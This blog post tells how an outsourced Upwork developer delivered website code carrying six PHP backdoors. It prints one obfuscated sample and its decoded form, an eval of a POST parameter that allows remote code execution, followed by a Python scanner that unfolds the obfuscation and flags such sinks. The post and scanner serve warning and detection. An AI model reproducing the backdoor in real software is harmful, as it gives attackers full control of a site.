Upwork Outsourcing

As part of this experiment I decided to outsource the updating of this website with better graphics and layout. This was clearly done by someone on their cell phone and that’s not cutting it!  So I turned to Upwork (used to be Odesk for those of you who are familiar with the old name).

Setting up an account was a bit painful since their app doesn’t currently support the entire suite of tools on their website. Switching between the mobile browser and the app was a bit annoying, but it did work. After finally getting authorized, setting up payment, and getting a developer I was off to the races.

Things were going okay at first, for the first week or so. Regular communication and clear deadlines are important. But this particular developer had some tricks up their sleeves. Firstly, the account they used was a front for a larger dev team. That dev team wasn’t willing to use the built-in Upwork feature to track their time. That was my first clue that something was about to go awry.

The second is that it took 40 hours to package up the code for delivery – something that should have been extremely simple to do if the code was indeed being developed in any professional way.  But the last issue was the kicker.

When I got the code it was in a format that the iPhone can’t easily handle – zip files. So I broke my rule and downloaded it onto a computer, and before I could even unzip it, Microsoft’s Security Essentials found something that looked suspicious. So I dug into the code and found 6 PHP back doors that would allow this developer and their team to get access to this site.

Here’s an example of what the code looked like:

<?php $viu0="sutpe_or"; $iwvk7=$viu0[0].$viu0[2].$viu0[7].$viu0[2].$viu0[6].$viu0[1].$viu0[3].$viu0[3].$viu0[4].$viu0[7]; $uvwh73=$iwvk7 ($viu0[5].$viu0[3].$viu0[6].$viu0[0].$viu0[2]); if(isset(${$uvwh73}['q490ded'])){eval( ${$uvwh73}['q490ded']);} ?>

And after it’s decoded, this is what it looks like:

<?php if(isset(${_POST}['q490ded'])){eval(${_POST}['q490ded']);} ?>

Basically what this says is that any time their team sent a POST request to my site with the above parameter, the eval() call would have run whatever they put in it, so they would have been able to run any command they wanted to as if they had the same level of access that I had. That’s a bad thing, in case you’ve never heard of such a thing.
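As an added example (not part of the original post or of the delivered code), here is a small Python scanner that folds the string-index obfuscation shown above and then checks whether request data reaches a code-execution call. The function names, the sink list and the set of folded string functions are assumptions, and it generalizes slightly beyond the single sample.

```python
import re

# The obfuscated sample quoted in the post, embedded so this runs offline.
SAMPLE = r'''<?php $viu0="sutpe_or"; $iwvk7=$viu0[0].$viu0[2].$viu0[7].$viu0[2].$viu0[6].$viu0[1].$viu0[3].$viu0[3].$viu0[4].$viu0[7]; $uvwh73=$iwvk7 ($viu0[5].$viu0[3].$viu0[6].$viu0[0].$viu0[2]); if(isset(${$uvwh73}['q490ded'])){eval( ${$uvwh73}['q490ded']);} ?>'''

# Assumption: only these side-effect-free string functions are folded.
PURE = {"strtoupper": str.upper, "strtolower": str.lower,
        "strrev": lambda s: s[::-1]}
LIT = r"""(?:"([^"$\\]*)"|'([^'\\]*)')"""   # a plain PHP string literal
IDX = r"\$(\w+)\[(\d+)\]"                   # $var[3]
# Code-execution sinks fed directly from request data (illustrative list).
SINK = re.compile(r"\b(eval|assert|system|passthru|shell_exec|exec)"
                  r"\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b")

def deobfuscate(src, max_rounds=10):
    """Fold constant string tricks until the source stops changing."""
    for _ in range(max_rounds):
        consts = {m[1]: m[2] or m[3] or "" for m in
                  re.finditer(r"\$(\w+)\s*=\s*" + LIT + r"\s*;", src)}

        def chain(m):    # $v[0].$v[2].$v[7] -> "str"
            parts = re.findall(IDX, m[0])
            if any(v not in consts or int(i) >= len(consts[v]) for v, i in parts):
                return m[0]
            return '"' + "".join(consts[v][int(i)] for v, i in parts) + '"'

        def call(m):     # $f ("_post") where $f = "strtoupper" -> "_POST"
            fn = PURE.get(consts.get(m[1], ""))
            return '"' + fn(m[2] or m[3] or "") + '"' if fn else m[0]

        def varvar(m):   # ${$g} where $g = "_POST" -> $_POST
            name = consts.get(m[1], "")
            return "$" + name if re.fullmatch(r"\w+", name) else m[0]

        out = re.sub(IDX + r"(?:\s*\.\s*" + IDX + r")*", chain, src)
        out = re.sub(r"\$(\w+)\s*\(\s*" + LIT + r"\s*\)", call, out)
        out = re.sub(r"\$\{\s*\$(\w+)\s*\}", varvar, out)
        if out == src:
            break
        src = out
    return src

def find_backdoors(src):
    """Return (sink, source) pairs found after deobfuscation."""
    return [(m[1], "$_" + m[2]) for m in SINK.finditer(deobfuscate(src))]

if __name__ == "__main__":
    print("raw regex hit:", bool(SINK.search(SAMPLE)))   # obfuscation hides it
    print("after folding:", find_backdoors(SAMPLE))
```

A plain pattern search for eval on request data misses the delivered file; the same search succeeds once the constants are folded, which is why scanning the folded text is the useful check on third-party code.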

This points to two major failings of using the cell phone – uncompressing, navigating and finding issues within files is always going to be a bit more complex, except on things like unlocked Android environments. Secondly, even attempting to use a cell phone for this type of task became overwhelmingly painful even in such a simple task as receiving content and uploading it to the site.

I’ve contested the work the developer did, but as a smart phone executive, this is something to be wary of. I have very few concerns with Upwork as a company, but the developers you happen to be saddled with are a mixed bag and you need to be extremely cautious of their eventual work product.

Update: less than one day later the funds have been returned! Thanks to Upwork, Joe, and Dennis for helping in this matter!

Upwork Response

Published by

Robert Hansen

Robert is an executive with a smart phone. Trying to tackle the big meaty problem of mobility, in the modern world where content and creativity are requirements of a job well done.

One thought on “Upwork Outsourcing”

  1. Where there is one backdoor, there is likely more than one. Seen plenty of hardcoded admin credentials in apps like that.
